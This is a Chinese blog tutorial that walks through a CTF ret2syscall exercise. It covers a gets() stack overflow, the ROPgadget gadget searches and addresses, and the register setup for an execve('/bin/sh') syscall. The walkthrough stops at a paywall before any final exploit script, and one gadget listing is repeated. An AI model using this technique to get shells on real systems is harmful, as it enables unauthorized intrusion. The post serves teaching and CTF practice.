从零开始学逆向:理解ret2syscall

已于 2024-02-24 17:35:59 修改
阅读量1.2k 收藏 23
点赞数 26
分类专栏: 逆向 二进制 Re 文章标签: 网络安全 安全 系统安全 安全架构
于 2024-02-19 00:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44626085/article/details/136126783
版权

1.题目信息

链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制

 2.原理 

ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?

  • 操作系统提供给用户的编程接口
  • 是提供访问操作系统所管理的底层硬件的接口
  • 本质上是一些内核函数代码,以规范的方式驱动硬件
  • x86 通过 int 0x80 指令进行系统调用、amd64 通过 syscall 指令进行系统调用 mov eax, 0xb mov ebx, [“/bin/sh”] mov ecx, 0 mov edx, 0 int 0x80 => execve("/bin/sh",NULL,NULL) 

    1.jpg

3.解题分析

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# chmod +x ret2syscall 
root@pwn_test1604:/ctf/work/how2heap/ret2syscall# checksec ./ret2syscall 
[*] '/ctf/work/how2heap/ret2syscall/ret2syscall'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
root@pwn_test1604:/ctf/work/how2heap/ret2syscall#

 3.1 使用ida打开分析

gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。

3.2 首先寻找控制 eax 的 gadgets ROPgadget --binary ret2syscall --only 'pop|ret' | grep 'eax'

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ROPgadget --binary ret2syscall --only 'pop|ret' | grep 'eax'
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x080bb196 : pop eax ; ret
0x0807217a : pop eax ; ret 0x80e
0x0804f704 : pop eax ; ret 3
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret

3.3 然后寻找控制ebx的 ROPgadget --binary ret2syscall --only 'pop|ret' | grep 'ebx',其中红色框框圈出来的能让我们控制余下的寄存器,就不用再接着找了

​
​
root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ROPgadget --binary ret2syscall --only 'pop|ret' | grep 'ebx'
0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret
0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret
0x080be23f : pop ebx ; pop edi ; ret
0x0806eb69 : pop ebx ; pop edx ; ret
0x08092258 : pop ebx ; pop esi ; pop ebp ; ret
0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x10
0x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x14
0x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc
0x0805ae81 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 4
0x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 8
0x08048913 : pop ebx ; pop esi ; pop edi ; ret
0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 4
0x08049a94 : pop ebx ; pop esi ; ret
0x080481c9 : pop ebx ; ret
0x080d7d3c : pop ebx ; ret 0x6f9
0x08099c87 : pop ebx ; ret 8
0x0806eb91 : pop ecx ; pop ebx ; ret
0x0806336b : pop edi ; pop esi ; pop ebx ; ret
0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret
0x0805c820 : pop esi ; pop ebx ; ret
0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0807b6ed : pop ss ; pop ebx ; ret
root@pwn_test1604:/ctf/work/how2heap/ret2syscall# 

​

​

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ROPgadget --binary ret2syscall --only 'pop|ret' | grep 'ebx'
0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret
0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret
0x080be23f : pop ebx ; pop edi ; ret
0x0806eb69 : pop ebx ; pop edx ; ret
0x08092258 : pop ebx ; pop esi ; pop ebp ; ret
0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x10
0x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x14
0x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc
0x0805ae81 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 4
0x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 8
0x08048913 : pop ebx ; pop esi ; pop edi ; ret
0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 4
0x08049a94 : pop ebx ; pop esi ; ret
0x080481c9 : pop ebx ; ret
0x080d7d3c : pop ebx ; ret 0x6f9
0x08099c87 : pop ebx ; ret 8
0x0806eb91 : pop ecx ; pop ebx ; ret
0x0806336b : pop edi ; pop esi ; pop ebx ; ret
0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret
0x0805c820 : pop esi ; pop ebx ; ret
0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0807b6ed : pop ss ; pop ebx ; ret

3.4 接着寻找程序中有没有int 80指令,ROPgadget --binary ret2syscall --only 'int'

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ROPgadget --binary ret2syscall --only 'int'
Gadgets information
============================================================
0x08049421 : int 0x80
0x080938fe : int 0xbb
0x080869b5 : int 0xf6
0x0807b4d4 : int 0xfc

Unique gadgets found: 4

3.5 最后我们还需要找到一个字符串/bin/sh,ROPgadget --binary ret2syscall --string '/bin/sh'

root@pwn_test1604:/ctf/work/how2heap/ret2syscall# ROPgadget --binary ret2syscall --string '/bin/sh'
Strings information
============================================================
0x080be408 : /bin/sh
root@pwn_test1604:/ctf/work/how2heap/ret2syscall#

3.6 这样我们就可以构造0xb的系统调用,具体要溢出多少字节可以使用gdb动态调试获取, gdb ret2syscall b main(在main函数下断点) r(让程序跑起来) n(单步执行) 一直走到gets函数输入字符串AAAAAAAA

3.7 然后使用stack 35命令查看栈内容

pwndbg> r
Starting program: /ctf/work/how2heap/ret2syscall/ret2syscall 

Breakpoint 1, main () at rop.c:8
8       in rop.c
LEGEND: STACK | HEAP |
最低0.47元/天 解锁文章
网络安全我来了
关注
  • 26
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【PWN】07.ret2syscall
weixin_52553215的博客
11-12 2321
Linux 在x86上的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。在 /usr/include/x86_64-linux-gnu/asm/unistd_64.h 和/usr/include/x86_64-linux-gnu/asm/unistd_32.h 分别可以查看 64 位和 32 位的系统调用号。
linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad
m0_67266787的博客
03-15 1169
文章目录 What is ret2syscall pwn题思路 例题 保护机制 写payload 打开flag 读取flag 写到输出中 生成shellcode 开始做题 调用read(0,mem,0x1000)把我们真正的shellcode写道mem 调试是否可以往mem写shellcode 往mem填写读取flag的shellcode 总结 What is ret2syscall ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到s
栈溢出入门(ret2syscall漏洞与gadget的利用)
2301_80718478的博客
07-05 922
这次的课件是有两个ELF文件,分别是由动态编译和静态编译生成的,这里说一下二者的区别就像C语言的#include<stdio.h>包含头文件一样,ELF可执行文件的实际运行也是需要这样的库的,这个库就是 libc.so.6位于/lib/x86_64-linux-gnu目录下运行动态编译的ELF文件时,会动态地调用执行者操作系统中的libc.so.6这个库;而静态编译的程序则在编译时就将这个库给打包一同编译了(之后libc.so.6简称libc)
字符串溢出(pwn溢出)--ret2syscall
莫慌的博客
09-29 762
pwn入门
【PWN · ret2syscall | GoPwn】[2024CISCN · 华中赛区]go_note
Mr_Fmnwon的博客
07-02 807
可以说是做的第一道GoPwn。。。进度确实太慢;此外,除了习了对GoPwn的调试、逆向,也关注了Gadget利用的一些trick,ret2syscall也又一次进阶式地复习,收获良多。本题受益良多,开心。
ret2syscall简单总结
ULGANOY的博客
07-05 685
主要是自己的简单的习总结。
CTF-PWN-栈溢出-基本ROP-【ret2syscall】
llovewuzhengzi的博客
11-21 280
发现这里有个move %rbp %rsp,那么如果之前存储的rbp合适的话,那么可以继续ROP,rbp应该为在syscall调用前的前十六个字节,因为还要有pop rbp和pop rbx得抵消掉。64位的系统调用号放在rax 传参依次是 RDI、RSI、RDX、R10、R8、R9 (和64位函数传参一样)如果发现start和end相同时,重写输入,否则返回输入的数据所在数组的一个start位置所在的字节。32的系统调用号与64位的不大一样 使用的时候最好百度一下。这里的sys_read存在很明显的溢出。
RET2syscall
T_Fire_of_Square的博客
12-18 97
基本rop之一,意为call system,控制程序执行系统调用,获取shell。
ret2syscall
最新发布
m0_62280492的博客
07-16 687
介绍pwn中32位系统和64位系统下的ret2syscall
ret2syscall前置知识
Rt1Text的博客
02-10 2783
1.目的 是拿到shell 2.具体操作 控制程序执行系统调用(字面理解就可) 3.系统调用是什么? 系统调用:system call 按照搜索的定义可理解为一种服务:程序运行在用户空间向操作系统内核(内核空间)请求更高权限运行 用户空间和内核空间可参考以下百度 用户空间_百度百科 (baidu.com) 系统调用提供用户程序与操作系统间的接口(大多数系统交互式操作系统需要在内核态执行) 系统调用就运行在内核空间 4.具体怎么做 linux在x86系统 触发int 0x80 ,借助
ROP-基础-ret2syscall
热门推荐
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1HBR7_yuCsP8awm_QNHTdAQ 提取码:uxt8 0x01.checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled ...
ROPgadget题型——ret2syscall
qq_41560595的博客
10-09 624
解题思路 这道题本来考虑使用libc来解,但发现不是动态链接形成的文件。 于是,考虑如下系统调用获取shell: execve("/bin/sh",NULL,NULL) 在32位程序中,参数一般是放在栈中的,但系统调用例外,参数是放在通用寄存器中的。即eax,ebx,ecx,edx。 eax:存放系统调用号,0xb ebx:存放第一个参数/bin/sh地址 ecx:存放第二个参数0 edx:存放第三个参数0 下面就是想办法把几个参数和调用号“弹到”寄存器上: 找到pop edx;pop ecx;pop e
pwn ret2syscall
young‘s blog
02-11 957
pwndbg的使用,文章在这里:gdb+pwndbg食用指南 这篇博客注定是一篇水文,因为昨天做了做XCTF攻防世界上的题目,基础题都做不来,那题应该是ret2text的内容,还是太菜,没有深刻理解原理,导致做不出,对于ret2syscall现在理解的不深刻,在这里记录一下是怎么做的吧,原理懂了再补上。 查看一下文件的基本信息 32位静态链接的程序,开启了NX保护。 由于是静态链接的,所以我...
通过GOT覆写实现ret2libc - 64-bit Linux stack smashing tutorial: Part 3
HappyOrange2014的专栏
04-11 3917
对于如何绕过ASLR,原作者认为有很多办法可以做到,但这里写的方法是非常有意思的一种方式。通过GOT来泄漏库函数地址,以推导出libc中其他函数(如system)的地址,从而获得shell。以下过程给出了译者的个人调试截图,可在实践时参考。由于译者也是初,翻译及调试过程中也存在一些疑问。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8363
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值